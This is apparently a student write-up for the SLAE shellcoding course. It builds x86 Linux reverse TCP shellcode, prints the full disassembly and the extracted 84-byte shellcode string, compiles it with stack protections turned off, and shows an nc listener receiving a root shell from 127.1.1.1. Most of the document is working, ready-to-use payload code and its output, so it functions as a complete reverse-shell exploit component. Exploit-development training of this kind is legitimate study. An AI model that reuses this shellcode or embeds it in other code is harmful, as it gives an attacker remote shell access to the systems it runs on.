
For Assignment # 2 we need do following :

Create a Shell_Reverse_TCP shellcode
– Reverse connects to configured IP and Port
– Execs shell on successful connecSon
IP and Port should be easily configurable

Step 1: Prepare the nasm file 

Disassembly of section .text:

08048060 <_start>:
 8048060:       31 db                   xor    ebx,ebx
 8048062:       f7 e3                   mul    ebx
 8048064:       b0 66                   mov    al,0x66
 8048066:       b3 01                   mov    bl,0x1
 8048068:       52                      push   edx
 8048069:       53                      push   ebx
 804806a:       6a 02                   push   0x2
 804806c:       89 e1                   mov    ecx,esp
 804806e:       cd 80                   int    0x80
 8048070:       89 c2                   mov    edx,eax
 8048072:       31 ff                   xor    edi,edi
 8048074:       b0 66                   mov    al,0x66
 8048076:       b3 03                   mov    bl,0x3
 8048078:       68 7f 01 01 01          push   0x101017f
 804807d:       66 68 01 bd             pushw  0xbd01
 8048081:       66 6a 02                pushw  0x2
 8048084:       89 e1                   mov    ecx,esp
 8048086:       6a 10                   push   0x10
 8048088:       51                      push   ecx
 8048089:       52                      push   edx
 804808a:       89 e1                   mov    ecx,esp
 804808c:       cd 80                   int    0x80
 804808e:       89 d3                   mov    ebx,edx
 8048090:       31 c9                   xor    ecx,ecx

08048092 <dup2>:
 8048092:       b0 3f                   mov    al,0x3f
 8048094:       cd 80                   int    0x80
 8048096:       fe c1                   inc    cl
 8048098:       80 f9 03                cmp    cl,0x3
 804809b:       74 02                   je     804809f <xbshell>
 804809d:       eb f3                   jmp    8048092 <dup2>

0804809f <xbshell>:
 804809f:       31 c9                   xor    ecx,ecx
 80480a1:       f7 e1                   mul    ecx
 80480a3:       51                      push   ecx
 80480a4:       68 6e 2f 73 68          push   0x68732f6e
 80480a9:       68 2f 2f 62 69          push   0x69622f2f
 80480ae:       89 e3                   mov    ebx,esp
 80480b0:       b0 0b                   mov    al,0xb
 80480b2:       cd 80                   int    0x80

Step 2: Obtain the shellcode from nasm file

root@kali:/home/SLAE/Assignment2# objdump -d ./Assignment2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc2\x31\xff\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x01\xbd\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x89\xd3\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\x80\xf9\x03\x74\x02\xeb\xf3\x31\xc9\xf7\xe1\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"

Step 3: compile & execute 

gcc -fno-stack-protector -z execstack  shellcode_Shell_Reverse_TCP_127.1.1.1_445.c -o Shell_Reverse_TCP_127.1.1.1_445

Step 4:  Execute & Setup listener (using nc)

root@kali:/home/SLAE/Assignment2# ./Shell_Reverse_TCP_127.1.1.1_445 
Shellcode Length:  84

In the listener, we will get a reverse TCP shell:

root@kali:~# nc -lnvp 445
listening on [any] 445 ...
connect to [127.1.1.1] from (UNKNOWN) [127.0.0.1] 51432
id
uid=0(root) gid=0(root) groups=0(root)



